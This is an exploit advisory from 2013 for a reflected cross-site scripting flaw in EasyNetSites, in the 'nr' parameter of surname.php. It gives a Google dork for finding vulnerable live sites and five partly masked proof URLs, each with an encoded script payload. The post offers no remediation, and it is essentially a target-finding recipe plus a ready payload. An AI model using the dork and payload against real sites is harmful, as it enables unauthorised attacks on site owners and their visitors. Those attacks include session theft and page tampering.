****************************************************************************
# Exploit Title : EasyNetSites Cross site scripting vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Date: 2013/08/21
# Vendor Page: http://www.easynetsites.com/
#****************************************************************************
# Tested on: Windows,Linux
#****************************************************************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Design by Webworx Design Group using EasyNetSites.com Webware"
#///////////////////////////////////////////////
# Location : /surname.php/?nr=[xss]
#
# Proof:
#
# http://wwXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwXXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwwXXg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wXXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
#########################
discovered by : ACC3SS
#########################